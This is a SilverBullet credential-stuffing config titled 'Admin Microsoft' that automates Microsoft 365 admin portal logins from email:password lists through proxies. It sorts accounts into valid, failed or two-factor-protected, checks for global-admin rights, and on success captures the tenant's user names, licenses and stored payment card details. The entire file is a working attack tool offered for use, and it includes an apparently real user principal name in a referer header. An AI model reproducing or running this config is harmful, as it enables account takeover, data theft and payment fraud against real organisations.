[SETTINGS]
{
  "Name": "Admin Microsoft",
  "SuggestedBots": 70,
  "MaxCPM": 0,
  "LastModified": "2022-05-05T03:28:10.7894925+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Heracles_1984",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Admin Microsoft",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://admin.microsoft.com/login?ru=%2FAdminportal%2FHome%3F" AutoRedirect=FALSE 
  
  HEADER "Host: admin.microsoft.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://admin.microsoft.com/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-GPC: 1" 
  HEADER "Accept-Encoding: gzip, deflate" 

REQUEST GET "<HEADERS(Location)>" 
  
  HEADER "Host: login.microsoftonline.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Referer: https://admin.microsoft.com/" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-GPC: 1" 
  HEADER "Accept-Encoding: gzip, deflate" 

#REQID PARSE "<HEADERS(x-ms-request-id)>" LR "" "" -> VAR "REQID" 

#FLOWTOK PARSE "<SOURCE>" LR "\",\"sFT\":\"" "\",\"" -> VAR "FLOWTOK" 

#CANARY PARSE "<SOURCE>" LR "\",\"canary\":\"" "\"," -> VAR "CANARY" 

#CTX PARSE "<SOURCE>" LR "\",\"sCtx\":\"" "\",\"" -> VAR "CTX" 

#AOUT PARSE "<SOURCE>" LR "\":\"OpenIdConnect.AuthenticationProperties=" "\"}" -> VAR "AOUT" 

#NONCE PARSE "<SOURCE>" LR "nonce=" "\\" -> VAR "NONCE" 

#CLIREQID PARSE "<SOURCE>" LR "\",\"correlationId\":\"" "\",\"" -> VAR "CLIREQID" 

#AUTCLI PARSE "<SOURCE>" LR "/authorize?client_id=" "\\" -> VAR "AUTCLI" 

REQUEST POST "https://login.microsoftonline.com/common/login" EncodeContent=TRUE 
  CONTENT "i13=0&login=<USER>&loginfmt=<USER>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PASS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=<CANARY>&ctx=<CTX>&hpgrequestid=<REQID>&flowToken=<FLOWTOK>&PPSX=&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&i19=1595078" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.microsoftonline.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Referer: <HEADERS(Location)>" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Origin: https://login.microsoftonline.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your account or password is incorrect" 
  KEYCHAIN Success OR 
    KEY "<COOKIES(ESTSAUTH)>" Exists 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Check at https://aka.ms/mfasetup\",e." 
    KEY "\"data\":\"OneWaySMS\",\"display\":\"+XXX XXXXXXXX00\",\"" 
    KEY "\":\"TwoWayVoiceMobile\",\"display\":\"+XXX XXXXXXXX00\",\"isD" 

REQUEST GET "https://admin.microsoft.com/login?ru=%2FAdminportal%2FHome%3Fref=/billoverview/PaymentMethods" 
  
  HEADER "Host: admin.microsoft.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Referer: https://admin.microsoft.com/Adminportal/Home" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Gpc: 1" 
  HEADER "Te: trailers" 

#ACTION PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"code\" value=\"" "\" /" -> VAR "ACTION" 

#IDTOK PARSE "<SOURCE>" LR "type=\"hidden\" name=\"id_token\" value=\"" "\" /" -> VAR "IDTOK" 

#STATE PARSE "<SOURCE>" LR "name=\"state\" value=\"" "\" />" -> VAR "STATE" 

#STAID PARSE "<SOURCE>" LR "type=\"hidden\" name=\"session_state\" value=\"" "\" /" -> VAR "STAID" 

#CORID PARSE "<SOURCE>" LR "/><input type=\"hidden\" name=\"correlation_id\" value=\"" "\" /" -> VAR "CORID" 

REQUEST POST "https://admin.microsoft.com/landing" 
  CONTENT "code=<ACTION>&id_token=<IDTOK>&state=<STATE>&session_state=<STAID>&correlation_id=<CORID>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: admin.microsoft.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Referer: https://login.microsoftonline.com/" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Origin: https://login.microsoftonline.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Te: trailers" 

#AJAX FUNCTION URLDecode "<COOKIES(s.AjaxSessionKey)>" -> VAR "AJAX" 

#APPID FUNCTION GenerateGUID -> VAR "APPID" 

REQUEST GET "https://admin.microsoft.com/admin/api/features/all" 
  
  HEADER "Host: admin.microsoft.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-Adminapp-Request: /homepage" 
  HEADER "Ajaxsessionkey: <AJAX>" 
  HEADER "X-Portal-Routekey: wuk" 
  HEADER "X-Ms-Mac-Target-App: MAC" 
  HEADER "X-Ms-Mac-Hostingapp: M365AdminPortal" 
  HEADER "X-Ms-Mac-Appid: <APPID>" 
  HEADER "X-Ms-Mac-Version: host-mac_2022.4.28.2" 
  HEADER "Referer: https://admin.microsoft.com/?auth_upn=PRATIK%40sunbeltne.onmicrosoft.com&source=applauncher" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Te: trailers" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"PrivateCatalogSendAdminUploadMail\":0," 
    KEY "{\"GlobalAdmin\":0," 
    KEY "\"ResetPasswordByUserAdmin\":0," 
  KEYCHAIN Success OR 
    KEY "\"GlobalAdmin\":1," 
    KEY "\"ResetPasswordByUserAdmin\":1," 
    KEY "\"PrivateCatalogSendAdminUploadMail\":1," 

REQUEST POST "https://admin.microsoft.com/admin/api/Users/ListUsers" AutoRedirect=FALSE 
  CONTENT "{\"ListAction\":-1,\"SortDirection\":0,\"ListContext\":null,\"SortPropertyName\":\"DisplayName\",\"SearchText\":\"\",\"SelectedView\":\"\",\"SelectedViewType\":\"\",\"ServerContext\":null}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: admin.microsoft.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Adminapp-Request: /users" 
  HEADER "Ajaxsessionkey: <AJAX>" 
  HEADER "X-Portal-Routekey: weu" 
  HEADER "X-Ms-Mac-Target-App: MAC" 
  HEADER "X-Ms-Mac-Hostingapp: M365AdminPortal" 
  HEADER "X-Ms-Mac-Appid: <APPID>" 
  HEADER "X-Ms-Mac-Version: host-mac_2022.4.28.2" 
  HEADER "Origin: https://admin.microsoft.com" 
  HEADER "Referer: https://admin.microsoft.com/Adminportal/Home" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Te: trailers" 

FUNCTION Constant "Admin" -> CAP "Type Account" 

#Display_Name_Users PARSE "<SOURCE>" JSON "DisplayName" Recursive=TRUE CreateEmpty=FALSE -> CAP "Display Name Users" 

#Licenses PARSE "<SOURCE>" JSON "Licenses" Recursive=TRUE CreateEmpty=FALSE -> CAP "Licenses" 

REQUEST GET "https://admin.microsoft.com/fd/commerceapi/my-org/paymentInstruments" 
  
  HEADER "Host: admin.microsoft.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "x-adminapp-request: /billoverview/PaymentMethods" 
  HEADER "AjaxSessionKey: <AJAX>" 
  HEADER "x-portal-routekey: frc" 
  HEADER "x-ms-mac-target-app: MAC" 
  HEADER "x-ms-mac-hostingapp: M365AdminPortal" 
  HEADER "x-ms-mac-appid: <APPID>" 
  HEADER "x-ms-mac-version: host-mac_2022.4.25.3" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://admin.microsoft.com/Adminportal/Home?" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-GPC: 1" 
  HEADER "Accept-Encoding: gzip, deflate" 

#LOGID PARSE "<COOKIES(s.LoginUserTenantId)>" LR "" "" -> VAR "LOGID" 

#payment_type PARSE "<SOURCE>" JSON "type" CreateEmpty=FALSE -> CAP "payment type" 

#Name_Card PARSE "<SOURCE>" JSON "issuer" CreateEmpty=FALSE -> CAP "Name Card" 

#Exp_Month PARSE "<SOURCE>" JSON "expirationMonth" CreateEmpty=FALSE -> CAP "Exp Month" 

#Exp_Year PARSE "<SOURCE>" JSON "expirationYear" CreateEmpty=FALSE -> CAP "Exp Year" 

FUNCTION Constant "@Heracles_1984" -> CAP "Config By" 

